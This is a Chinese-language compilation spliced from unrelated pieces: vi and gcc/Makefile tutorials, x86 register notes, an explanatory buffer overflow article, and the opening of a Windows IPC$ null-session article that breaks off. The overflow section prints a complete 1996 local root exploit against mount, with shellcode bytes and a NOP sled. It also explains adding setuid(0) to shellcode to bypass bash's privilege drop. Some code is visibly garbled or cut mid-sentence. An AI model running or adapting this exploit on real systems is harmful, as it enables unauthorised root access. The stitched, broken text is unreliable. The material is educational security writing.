另外，正如我们在本文前言中所指出的那样，如果读者使用的是较高版本的bash的话，那么即使您在运行攻击程序exe之后得到了一个新的shell，您可能会发现并没有得到您所期望的root权限。其实这正是的高版本bash的改进之一。由于近十年来缓冲区溢出攻击屡见不鲜，而且大部分的攻击对象都是系统中属主为root的setuid程序，以借此获得root权限。因此以root权限运行系统中的程序是十分危险的。为此，在新的POSIX.1标准中增加了一个名为seteuid(2)的系统调用，其作用在于改变进程的effective uid。而新版本的bash也都纷纷采用了这一技术，在bash启动运行之初首先通过调用seteuid(getuid())将bash的运行权限恢复为进程属主的权限，这样就出现了我们在高版本bash中运行攻击程序exe所看到的结果。那么高版本的bash就已经无懈可击了吗？其实不然，只要在通过execve(2)创建shell之前先调用setuid(0)将进程的uid也改为0，bash的这一改进也就徒劳无功了。也就是说，你所要做的就是遵照前面所讲的系统调用规则将setuid(0)加入到shellcode中，而新版shellocde的这一改进只需要很少的工作量。附件中的shellcodeasm3.c和exe_pro.c告诉了你该如何去做。

回页首

结束语

安全有两种不同的表现形式，一种是如果你所使用的系统在安全上存在漏洞，但是黑客们对此一无所知，那么你可以暂且认为你的系统是安全的；另一种是黑客和你都发现了系统中的安全漏洞，但是你会想方设法将漏洞弥补上，使你的系统真正无懈可击。你想要的是哪一种呢？圣经上的一句话给出了这个问题的答案，而这句话也被刻在了美国中央情报局大厅的墙壁上：“你应当了解真相，真相会使你自由。”

回页首

参考资料

• Aleph One. Smashing The Stack For Fun And Profit.
  
  
  
• Pierre-Alain FAYOLLE, Vincent GLAUME. A Buffer Overflow Study -- Attacks & Defenses.
  
  
  
• Taeho Oh. Advanced buffer overflow exploit.
  
  
  
• 绿盟科技（nsfocus）. NSFOCUS 2002年十大安全漏洞, 2002, http://www.nsfocus.net/index.php?act=sec_bug&do=top_ten
  
  
  
• 王卓威。基于系统行为模式的缓冲区溢出攻击检测技术。
  
  
  
• developerWorks上的 《使您的软件运行起来：防止缓冲区溢出》为您列出了标准C库中所有存在安全隐患的函数以及对这些函数的使用建议。
  
  
  
• 毛德操，胡希明的《Linux内核源代码情景分析》向读者介绍了Linux下嵌入式汇编语言的语法。
  
  
  
• W.Richard Stevens的《Advanced Programming in the UNIX Environment》为您详细介绍了uid和effective uid的概念以及setuid(2)和seteuid(2)等相关函数的用法。
  
  
  
• Joel Scambray, Stuart McClure, George Kurtz的《Hacking Exposed》向读者介绍了网络安全的方方面面，从而使读者对网络安全有更多的了解，知道如何去加强安全性。
  
  
  
• Intel. Intel Architecture Software Developer's Manual. Intel Corporation.
  
  

回页首

关于作者

	王勇，现在北京航空航天大学计算机学院系统软件实验室攻读计算机硕士学位，主要研究领域为操作系统及分布式文件系统。可以通过 yongwang@buaa.edu.cn与他联系。

4、Last line mode下命令简介
　　在使用「last line mode」之前，请记住先按「ESC」键确定您已经处于「command mode」下后，再按「：」冒号即可进入「last line mode」。

A) 列出行号

　「set nu」：输入「set nu」后，会在文件中的每一行前面列出行号。

B) 跳到文件中的某一行

　「#」：「#」号表示一个数字，在冒号后输入一个数字，再按回车键就会跳到该行了，如输入数字15，再回车，就会跳到文章的第15行。

C) 查找字符

　「/关键字」：先按「/」键，再输入您想寻找的字符，如果第一次找的关键字不是您想要的，可以一直按「n」会往后寻找到您要的关键字为止。

　「?关键字」：先按「?」键，再输入您想寻找的字符，如果第一次找的关键字不是您想要的，可以一直按「n」会往前寻找到您要的关键字为止。

D) 保存文件

　「w」：在冒号输入字母「w」就可以将文件保存起来。

E) 离开vi

　「q」：按「q」就是退出，如果无法离开vi，可以在「q」后跟一个「!」强制离开vi。

　「qw」：一般建议离开时，搭配「w」一起使用，这样在退出的时候还可以保存文件。

5、vi命令列表
1、下表列出命令模式下的一些键的功能：

h
左移光标一个字符

l
右移光标一个字符

k
光标上移一行

j
光标下移一行

^
光标移动至行首

0
数字"0"，光标移至文章的开头

G
光标移至文章的最后

$
光标移动至行尾

Ctrl+f
向前翻屏

Ctrl+b
向后翻屏

Ctrl+d
向前翻半屏

Ctrl+u
向后翻半屏

i
在光标位置前插入字符

a
在光标所在位置的后一个字符开始增加

o
插入新的一行，从行首开始输入

ESC
从输入状态退至命令状态

x
删除光标后面的字符

#x
删除光标后的＃个字符

X
(大写X)，删除光标前面的字符

#X
删除光标前面的#个字符

dd
删除光标所在的行

#dd
删除从光标所在行数的#行

yw
复制光标所在位置的一个字

#yw
复制光标所在位置的#个字

yy
复制光标所在位置的一行

#yy
复制从光标所在行数的#行

p
粘贴

u
取消操作

cw
更改光标所在位置的一个字

#cw
更改光标所在位置的#个字

2、下表列出行命令模式下的一些指令
w filename
储存正在编辑的文件为filename

wq filename
储存正在编辑的文件为filename，并退出vi

q!
放弃所有修改，退出vi

set nu
显示行号

/或?
查找，在/后输入要查找的内容

n
与/或?一起使用，如果查找的内容不是想要找的关键字，按n或向后（与/联用）或向前（与?联用）继续查找，直到找到为止。

对于第一次用vi，有几点注意要提醒一下：
1、用vi打开文件后，是处于「命令行模式（command mode）」，您要切换到「插入模式（Insert mode）」才能够输入文字。切换方法：在「命令行模式（command mode）」下按一下字母「i」就可以进入「插入模式（Insert mode）」，这时候你就可以开始输入文字了。
2、编辑好后，需从插入模式切换为命令行模式才能对文件进行保存，切换方法：按「ESC」键。
3、保存并退出文件：在命令模式下输入:wq即可！（别忘了wq前面的:） 

--------------------------------------------------------------------------------
1.源程序的编译
在Linux下面,如果要编译一个C语言源程序,我们要使用GNU的gcc编译器. 下面我们以一个实例来说明如何使用gcc编译器.
假设我们有下面一个非常简单的源程序(hello.c):
int main(int argc,char **argv)
{
printf("Hello Linux\n");
}

要编译这个程序,我们只要在命令行下执行:
gcc -o hello hello.c
gcc 编译器就会为我们生成一个hello的可执行文件.执行./hello就可以看到程序的输出结果了.命令行中 gcc表示我们是用gcc来编译我们的源程序,-o 选项表示我们要求编译器给我们输出的可执行文件名为hello 而hello.c是我们的源程序文件.
gcc编译器有许多选项,一般来说我们只要知道其中的几个就够了. -o选项我们已经知道了,表示我们要求输出的可执行文件名. -c选项表示我们只要求编译器输出目标代码,而不必要输出可执行文件. -g选项表示我们要求编译器在编译的时候提供我们以后对程序进行调试的信息.
知道了这三个选项,我们就可以编译我们自己所写的简单的源程序了,如果你想要知道更多的选项,可以查看gcc的帮助文档,那里有着许多对其它选项的详细说明.
2.Makefile的编写
假设我们有下面这样的一个程序,源代码如下:

/* main.c */
＃i nclude "mytool1.h"
＃i nclude "mytool2.h"

int main(int argc,char **argv)
{
mytool1_print("hello");
mytool2_print("hello");
}

/* mytool1.h */
#ifndef _MYTOOL_1_H
#define _MYTOOL_1_H

void mytool1_print(char *print_str);

#endif

/* mytool1.c */
＃i nclude "mytool1.h"
void mytool1_print(char *print_str)
{
printf("This is mytool1 print %s\n",print_str);
}

/* mytool2.h */
#ifndef _MYTOOL_2_H
#define _MYTOOL_2_H

void mytool2_print(char *print_str);

#endif

/* mytool2.c */
＃i nclude "mytool2.h"
void mytool2_print(char *print_str)
{
printf("This is mytool2 print %s\n",print_str);
}

当然由于这个程序是很短的我们可以这样来编译
gcc -c main.c
gcc -c mytool1.c
gcc -c mytool2.c
gcc -o main main.o mytool1.o mytool2.o
这样的话我们也可以产生main程序,而且也不时很麻烦.但是如果我们考虑一下如果有一天我们修改了其中的一个文件(比如说mytool1.c)那么我们难道还要重新输入上面的命令?也许你会说,这个很容易解决啊,我写一个SHELL脚本,让她帮我去完成不就可以了.是的对于这个程序来说,是可以起到作用的.但是当我们把事情想的更复杂一点,如果我们的程序有几百个源程序的时候,难道也要编译器重新一个一个的去编译?
为此,聪明的程序员们想出了一个很好的工具来做这件事情,这就是make.我们只要执行以下make,就可以把上面的问题解决掉.在我们执行make之前,我们要先编写一个非常重要的文件.--Makefile.对于上面的那个程序来说,可能的一个Makefile的文件是:
# 这是上面那个程序的Makefile文件
main:main.o mytool1.o mytool2.o
gcc -o main main.o mytool1.o mytool2.o
main.o:main.c mytool1.h mytool2.h
gcc -c main.c
mytool1.o:mytool1.c mytool1.h
gcc -c mytool1.c
mytool2.o:mytool2.c mytool2.h
gcc -c mytool2.c

有了这个Makefile文件,不过我们什么时候修改了源程序当中的什么文件,我们只要执行make命令,我们的编译器都只会去编译和我们修改的文件有关的文件,其它的文件她连理都不想去理的.
下面我们学习Makefile是如何编写的.
在Makefile中也#开始的行都是注释行.Makefile中最重要的是描述文件的依赖关系的说明.一般的格式是:
target: components
TAB rule

第一行表示的是依赖关系.第二行是规则.
比如说我们上面的那个Makefile文件的第二行
main:main.o mytool1.o mytool2.o
表示我们的目标(target)main的依赖对象(components)是main.o mytool1.o mytool2.o 当倚赖的对象在目标修改后修改的话,就要去执行规则一行所指定的命令.就象我们的上面那个Makefile第三行所说的一样要执行 gcc -o main main.o mytool1.o mytool2.o 注意规则一行中的TAB表示那里是一个TAB键
Makefile有三个非常有用的变量.分别是$@,$^,$

int main(int argc,char **argv)
{
double value;
printf("Value:%f\n",value);
}

这个程序相当简单,但是当我们用 gcc -o temp temp.c 编译时会出现下面所示的错误.
/tmp/cc33Kydu.o: In function `main':
/tmp/cc33Kydu.o(.text+0xe): undefined reference to `log'
collect2: ld returned 1 exit status

出现这个错误是因为编译器找不到log的具体实现.虽然我们包括了正确的头文件,但是我们在编译的时候还是要连接确定的库.在Linux下,为了使用数学函数,我们必须和数学库连接,为此我们要加入 -lm 选项. gcc -o temp temp.c -lm这样才能够正确的编译.也许有人要问,前面我们用printf函数的时候怎么没有连接库呢?是这样的,对于一些常用的函数的实现,gcc编译器会自动去连接一些常用库,这样我们就没有必要自己去指定了. 有时候我们在编译程序的时候还要指定库的路径,这个时候我们要用到编译器的 -L选项指定路径.比如说我们有一个库在 /home/hoyt/mylib下,这样我们编译的时候还要加上 -L/home/hoyt/mylib.对于一些标准库来说,我们没有必要指出路径.只要它们在起缺省库的路径下就可以了.系统的缺省库的路径/lib /usr/lib /usr/local/lib 在这三个路径下面的库,我们可以不指定路径.
还有一个问题,有时候我们使用了某个函数,但是我们不知道库的名字,这个时候怎么办呢?很抱歉,对于这个问题我也不知道答案,我只有一个傻办法.首先,我到标准库路径下面去找看看有没有和我用的函数相关的库,我就这样找到了线程(thread)函数的库文件(libpthread.a). 当然,如果找不到,只有一个笨方法.比如我要找sin这个函数所在的库. 就只好用 nm -o /lib/*.so|grep sin>~/sin 命令,然后看~/sin文件,到那里面去找了. 在sin文件当中,我会找到这样的一行libm-2.1.2.so:00009fa0 W sin 这样我就知道了sin在 libm-2.1.2.so库里面,我用 -lm选项就可以了(去掉前面的lib和后面的版本标志,就剩下m了所以是 -lm). 如果你知道怎么找,请赶快告诉我,我回非常感激的.谢谢!
4.程序的调试
我们编写的程序不太可能一次性就会成功的,在我们的程序当中,会出现许许多多我们想不到的错误,这个时候我们就要对我们的程序进行调试了.
最常用的调试软件是gdb.如果你想在图形界面下调试程序,那么你现在可以选择xxgdb.记得要在编译的时候加入 -g选项.关于gdb的使用可以看gdb的帮助文件.由于我没有用过这个软件,所以我也不能够说出如何使用. 不过我不喜欢用gdb.跟踪一个程序是很烦的事情,我一般用在程序当中输出中间变量的值来调试程序的.当然你可以选择自己的办法,没有必要去学别人的.现在有了许多IDE环境,里面已经自己带了调试器了.你可以选择几个试一试找出自己喜欢的一个用.

5.头文件和系统求助
有时候我们只知道一个函数的大概形式,不记得确切的表达式,或者是不记得着函数在那个头文件进行了说明.这个时候我们可以求助系统.
比如说我们想知道fread这个函数的确切形式,我们只要执行 man fread 系统就会输出着函数的详细解释的.和这个函数所在的头文件说明了. 如果我们要write这个函数的说明,当我们执行man write时,输出的结果却不是我们所需要的. 因为我们要的是write这个函数的说明,可是出来的却是write这个命令的说明.为了得到write的函数说明我们要用 man 2 write. 2表示我们用的write这个函数是系统调用函数,还有一个我们常用的是3表示函数是C的库函数.
记住不管什么时候,man都是我们的最好助手.

七、寄存器

1. Register usage in 32 bit Windows
Function parameters are passed on the stack according to the calling conventions listed on
page 13. Parameters of 32 bits size or less use one DWORD of stack space. Parameters
bigger than 32 bits are stored in little-endian form, i.e. with the least significant DWORD at the
lowest address, and DWORD aligned.
Function return values are passed in registers in most cases. 8-bit integers are returned in
AL, 16-bit integers in AX, 32-bit integers, pointers, and Booleans in EAX, 64-bit integers in
EDX:EAX, and floating-point values in ST(0). Structures and class objects not exceeding
64 bits size are returned in the same way as integers, even if the structure contains floating
point values. Structures and class objects bigger than 64 bits are returned through a pointer
passed to the function as the first parameter and returned in EAX. Compilers that don\'t
support 64-bit integers may return structures bigger than 32 bits through a pointer. The
Borland compiler also returns structures through a pointer if the size is not a power of 2.
Registers EAX, ECX and EDX may be changed by a procedure. All other general-purpose
registers (EBX, ESI, EDI, EBP) must be saved and restored if they are used. The value of
ESP must be divisible by 4 at all times, so don\'t push 16-bit data on the stack. Segment
registers cannot be changed, not even temporarily. CS, DS, ES, and SS all point to the flat
segment group. FS is used for a thread environment block. GS is unused, but reserved.
Flags may be changed by a procedure with the following restrictions: The direction flag is 0
by default. The direction flag may be set temporarily, but must be cleared before any call or
return. The interrupt flag cannot be cleared. The floating-point register stack is empty at the
entry of a procedure and must be empty at return, except for ST(0) if it is used for return
value. MMX registers may be changed by the procedure and if so cleared by EMMS before
returning and before calling any other procedure that may use floating-point registers. All
XMM registers can be modified by procedures. Rules for passing parameters and return
values in XMM registers are described in Intel\'s application note AP 589 "Software
Conventions for Streaming SIMD Extensions". A procedure can rely on EBX, ESI, EDI, EBP
and all segment registers being unchanged across a call to another procedure.
2. Register usage in Linux
The rules for register usage in Linux appear to be almost the same as for 32-bit windows.
Registers EAX, ECX, and EDX may be changed by a procedure. All other general-purpose
registers must be saved. There appears to be no rule for the direction flag. Function return
values are transferred in the same way as under Windows. Calling conventions are the
same, except for the fact that no underscore is prefixed to public names. I have no
information about the use of FS and GS in Linux. It is not difficult to make an assembly
function that works under both Windows and Linux, if only you take these minor differences
into account.

八、位操作指令，处理器控制指令
 1.位操作指令，8086新增的一组指令，包括位测试，位扫描。BT,BTC,BTR,BTS,BSF,BSR
 1.1 BT(Bit Test)，位测试指令，指令格式:
   BT OPRD1,OPRD2,规则：操作作OPRD1可以是16位或32位的通用寄存器或者存储单元。操作数OPRD2必须是8位立即数或者是与OPRD1操作数长度相等的通用寄存器。如果用OPRD2除以OPRD1，假设商存放在Divd中，余数存放在Mod中，那么对OPRD1操作数要进行测试的位号就是Mod,它的主要功能就是把要测试位的值送往CF，看几个简单的例子：
 1.2 BTC(Bit Test And Complement)，测试并取反用法和规则与BT是一样，但在功能有些不同，它不但将要测试位的值送往CF，并且还将该位取反。
 1.3 BTR(Bit Test And Reset)，测试并复位，用法和规则与BT是一样，但在功能有些不同，它不但将要测试位的值送往CF，并且还将该位复位(即清0)。
 1.4 BTS(Bit Test And Set)，测试并置位，用法和规则与BT是一样，但在功能有些不同，它不但将要测试位的值送往CF，并且还将该位置位(即置1)。
 1.5 BSF(Bit Scan Forward)，顺向位扫描，指令格式:BSF OPRD1,OPRD2，功能：将从右向左(从最低位到最高位）对OPRD2操作数进行扫描，并将第一个为1的位号送给操作数OPRD1。操作数OPRD1，OPRD2可以是16位或32位通用寄存器或者存储单元，但OPRD1和OPRD2操作数的长度必须相等。
 1.6 BSR(Bit Scan Reverse)，逆向位扫描，指令格式:BSR OPRD1,OPRD2，功能：将从左向右(从最高位到最低位）对OPRD2操作数进行扫描，并将第一个为1的位号送给操作数OPRD1。操作数OPRD1，OPRD2可以是16位或32位通用寄存器或存储单元，但OPRD1和OPRD2操作数的长度必须相等。
 1.7 举个简单的例子来说明这6条指令:

 AA DW 1234H,5678H
 BB DW 9999H,7777H
 MOV EAX,12345678H
 MOV BX,9999H
 BT EAX,8;CF=0,EAX保持不变
 BTC EAX,8;CF=0,EAX=12345778H
 BTR EAX,8;CF=0,EAX=12345678H
 BTS EAX,8;CF=0,EAX=12345778H
 BSF AX,BX;AX=0
 BSR AX,BX;AX=15
 
 BT WORD PTR [AA],4;CF=1，[AA]的内容不变
 BTC WORD PTR [AA],4;CF=1，[AA]=1223H
 BTR WORD PTR [AA],4;CF=1，[AA]=1223H
 BTS WORD PTR [AA],4;CF=1，[AA]=1234H
 BSF WORD PTR [AA],BX;[AA]=0;
 BSR WORD PTR [AA],BX;[AA]=15(十进制) 
 
 BT DWORD PTR [BB],12;CF=1,[BB]的内容保持不变
 BTC DWORD PTR [BB],12;CF=1,[BB]=76779999H
 BTR DWORD PTR [BB],12;CF=1,[BB]=76779999H
 BTS DWORD PTR [BB],12;CF=1,[BB]=77779999H
 BSF DWORD PTR [BB],12;[BB]=0
 BSR DWORD PTR [BB],12;[BB]=31(十进制) 

 2.处理器控制指令
 处理器控制指令主要是用来设置/清除标志，空操作以及与外部事件同步等。
 2.1 CLC，将CF标志位清0。
 2.2 STC，将CF标志位置1。
 2.3 CLI，关中断。
 2.4 STI，开中断。
 2.5 CLD，清DF=0。
 2.6 STD，置DF=1。
 2.7 NOP，空操作，填补程序中的空白区，空操作本身不执行任何操作，主要是为了保持程序的连续性。
 2.8 WAIT，等待BUSY引脚为高。
 2.9 LOCK，封锁前缀可以锁定其后指令的操作数的存储单元，该指令在指令执行期间一直有效。在多任务环境中，可以用它来保证独占其享内存，只有以下指令才可以用LOCK前缀:
  XCHG,ADD,ADC,INC,SUB,SBB,DEC,NEG,OR,AND,XOR,NOT,BT,BTS,BTR,BTC
 3.0 说明处理器类型的伪指令
  .8086，只支持对8086指令的汇编
  .186，只支持对80186指令的汇编
  .286，支持对非特权的80286指令的汇编
  .286C，支持对非特权的80286指令的汇编
  .286P，支持对80286所有指令的汇编
  .386，支持对80386非特权指令的汇编
  .386C，支持对80386非特权指令的汇编
  .386P，支持对80386所有指令的汇编
  只有用伪指令说明了处理器类型，汇编程序才知道如何更好去编译，连接程序，更好地去检错。
  在后续的几篇里将详细介绍80386的段页管理机制及控制寄存器，调试寄存器，以及如何在386实模下和保护模式下编程。

当程序中发生函数调用时，计算机做如下操作：首先把参数压入堆栈；然后保存指令寄存器(IP)中的内容作为返回地址(RET)；第三个放入堆栈的是基址寄存器(FP)；然后把当前的栈指针(SP)拷贝到FP，做为新的基地址；最后为本地变量留出一定空间，把SP减去适当的数值。以下面程序为例：

example2.c
void func1(char * input) {
char buffer[16];
strcpy(buffer, input);
}
void main() {
char longstring[256];
int i;
for( i = 0; i < 255; i++)
longstring [i] = 'B';
func1(longstring);
}

当调用函数func1()时，堆栈如下：

不用说，程序执行的结果是"Segmentation fault (core dumped)"或类似的出错信息。因为从buffer开始的256个字节都将被* input的内容'B'覆盖，包括sfp, ret,甚至*input。'B'的16进值为0x41，所以函数的返回地址变成了0x41414141，这超出了程序的地址空间，所以出现段错误。


三、缓冲区溢出漏洞攻击方式

缓冲区溢出漏洞可以使任何一个有黑客技术的人取得机器的控制权甚至是最高权限。一般利用缓冲区溢出漏洞攻击root程序，大都通过执行类似“exec(sh)”的执行代码来获得root 的shell。黑客要达到目的通常要完成两个任务，就是在程序的地址空间里安排适当的代码和通过适当的初始化寄存器和存储器，让程序跳转到安排好的地址空间执行。

1、在程序的地址空间里安排适当的代码
在程序的地址空间里安排适当的代码往往是相对简单的。如果要攻击的代码在所攻击程序中已经存在了，那么就简单地对代码传递一些参数，然后使程序跳转到目标中就可以完成了。攻击代码要求执行“exec(‘/bin/sh’)”，而在libc库中的代码执行“exec(arg)”，其中的“arg”是个指向字符串的指针参数，只要把传入的参数指针修改指向“/bin/sh”，然后再跳转到libc库中的响应指令序列就可以了。当然，很多时候这个可能性是很小的，那么就得用一种叫“植入法”的方式来完成了。当向要攻击的程序里输入一个字符串时，程序就会把这个字符串放到缓冲区里，这个字符串包含的数据是可以在这个所攻击的目标的硬件平台上运行的指令序列。缓冲区可以设在：堆栈（自动变量）、堆（动态分配的）和静态数据区（初始化或者未初始化的数据）等的任何地方。也可以不必为达到这个目的而溢出任何缓冲区，只要找到足够的空间来放置这些攻击代码就够了。

2、控制程序转移到攻击代码的形式
缓冲区溢出漏洞攻击都是在寻求改变程序的执行流程，使它跳转到攻击代码，最为基本的就是溢出一个没有检查或者其他漏洞的缓冲区，这样做就会扰乱程序的正常执行次序。通过溢出某缓冲区，可以改写相近程序的空间而直接跳转过系统对身份的验证。原则上来讲攻击时所针对的缓冲区溢出的程序空间可为任意空间。但因不同地方的定位相异，所以也就带出了多种转移方式。

（1）Function Pointers（函数指针）
在程序中，“void (* foo) ( )”声明了个返回值为“void” Function Pointers的变量“foo”。Function Pointers可以用来定位任意地址空间，攻击时只需要在任意空间里的Function Pointers邻近处找到一个能够溢出的缓冲区，然后用溢出来改变Function Pointers。当程序通过Function Pointers调用函数，程序的流程就会实现。

（2）Activation Records（激活记录）
当一个函数调用发生时，堆栈中会留驻一个Activation Records，它包含了函数结束时返回的地址。执行溢出这些自动变量，使这个返回的地址指向攻击代码，再通过改变程序的返回地址。当函数调用结束时，程序就会跳转到事先所设定的地址，而不是原来的地址。这样的溢出方式也是较常见的。

（3）Longjmp buffers（长跳转缓冲区）
在C语言中包含了一个简单的检验/恢复系统，称为“setjmp/longjmp”，意思是在检验点设定“setjmp(buffer)”，用longjmp(buffer)“来恢复检验点。如果攻击时能够进入缓冲区的空间，感觉“longjmp(buffer)”实际上是跳转到攻击的代码。像Function Pointers一样，longjmp缓冲区能够指向任何地方，所以找到一个可供溢出的缓冲区是最先应该做的事情。

3、植入综合代码和流程控制
常见的溢出缓冲区攻击类是在一个字符串里综合了代码植入和Activation Records。攻击时定位在一个可供溢出的自动变量，然后向程序传递一个很大的字符串，在引发缓冲区溢出改变Activation Records的同时植入代码（权因C在习惯上只为用户和参数开辟很小的缓冲区）。植入代码和缓冲区溢出不一定要一次性完成，可以在一个缓冲区内放置代码（这个时候并不能溢出缓冲区），然后通过溢出另一个缓冲区来转移程序的指针。这样的方法一般是用于可供溢出的缓冲区不能放入全部代码时的。如果想使用已经驻留的代码不需要再外部植入的时候，通常必须先把代码做为参数。在libc（熟悉C的朋友应该知道，现在几乎所有的C程序连接都是利用它来连接的）中的一部分代码段会执行“exec(something)”，当中的something就是参数，使用缓冲区溢出改变程序的参数，然后利用另一个缓冲区溢出使程序指针指向libc中的特定的代码段。

程序编写的错误造成网络的不安全性也应当受到重视，因为它的不安全性已被缓冲区溢出表现得淋漓尽致了。


四、利用缓冲区溢出进行的系统攻击

如果已知某个程序有缓冲区溢出的缺陷，如何知道缓冲区的地址，在哪儿放入shell代码呢？由于每个程序的堆栈起始地址是固定的，所以理论上可以通过反复重试缓冲区相对于堆栈起始位置的距离来得到。但这样的盲目猜测可能要进行数百至上千次，实际上是不现实的。解决的办法是利用空指令NOP。在shell代码前面放一长串的NOP，返回地址可以指向这一串NOP中任一位置，执行完NOP指令后程序将激活shell进程。这样就大大增加了猜中的可能性。下面是一个缓冲区溢出攻击的实例，它利用了系统程序mount的漏洞：

example5.c
/* Mount Exploit for Linux, Jul 30 1996
Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/
#include
#include
#include
#include
#include
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}

程序中get_esp()函数的作用就是定位堆栈位置。程序首先分配一块暂存区buff,然后在buff的前面部分填满NOP，后面部分放shell代码。最后部分是希望程序返回的地址，由栈地址加偏移得到。当以buff为参数调用mount时，将造成mount程序的堆栈溢出，其缓冲区被buff覆盖，而返回地址将指向NOP指令。

由于mount程序的属主是root且有suid位，普通用户运行上面程序的结果将获得一个具有root权限的shell。


五、缓冲区溢出的保护方法

目前有四种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响：

1、强制写正确的代码的方法
编写正确的代码是一件非常有意义但耗时的工作，特别像编写C语言那种具有容易出错倾向的程序（如：字符串的零结尾），这种风格是由于追求性能而忽视正确性的传统引起的。尽管花了很长的时间使得人们知道了如何编写安全的程序，具有安全漏洞的程序依旧出现。因此人们开发了一些工具和技术来帮助经验不足的程序员编写安全正确的程序。虽然这些工具帮助程序员开发更安全的程序，但是由于C语言的特点，这些工具不可能找出所有的缓冲区溢出漏洞。所以，侦错技术只能用来减少缓冲区溢出的可能，并不能完全地消除它的存在。除非程序员能保证他的程序万无一失，否则还是要用到以下部分的内容来保证程序的可靠性能。

2、通过操作系统使得缓冲区不可执行，从而阻止攻击者殖入攻击代码
这种方法有效地阻止了很多缓冲区溢出的攻击，但是攻击者并不一定要殖入攻击代码来实现缓冲区溢出的攻击，所以这种方法还是存在很多弱点的。

3、利用编译器的边界检查来实现缓冲区的保护
这个方法使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁，但是相对而言代价比较大。

4、在程序指针失效前进行完整性检查
这样虽然这种方法不能使得所有的缓冲区溢出失效，但它的确确阻止了绝大多数的缓冲区溢出攻击，而能够逃脱这种方法保护的缓冲区溢出也很难实现。

最普通的缓冲区溢出形式是攻击活动纪录然后在堆栈中殖入代码。这种类型的攻击在1996年中有很多纪录。而非执行堆栈和堆栈保护的方法都可以有效防卫这种攻击。非执行堆栈可以防卫所有把代码殖入堆栈的攻击方法，堆栈保护可以防卫所有改变活动纪录的方法。这两种方法相互兼容，可以同时防卫多种可能的攻击。
剩下的攻击基本上可以用指针保护的方法来防卫，但是在某些特殊的场合需要用手工来实现指针保护。全自动的指针保护需要对每个变量加入附加字节，这样使得指针边界检查在某些情况下具有优势。

最为有趣的是，缓冲区溢出漏洞--Morris蠕虫使用了现今所有方法都无法有效防卫的方法，但是由于过于复杂的缘故却很少有人用到。

在本文中，我们详细描述和分析了缓冲区溢出的原理，并简单介绍了几种防卫方法。由于这种攻击是目前常见的攻击手段，所以进行这个方面的研究工作是有意义和成效的。


参考文献
[1] 网络入侵检测分析员手册. Stephen Northcutt著.余青霓等译.人民邮电出版社,2000.3
[2] C语言疑难问题解析. 严桂兰,刘甲耀编著.华东华工学院出版社,1993,1.
[3] 网络最高安全技术指南. 王锐等译.机械工业出版社,1998,5.

一 摘要
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？

三 什么是空会话
在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
果返回到服务器（实现响应）；
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？

四 空会话可以做什么
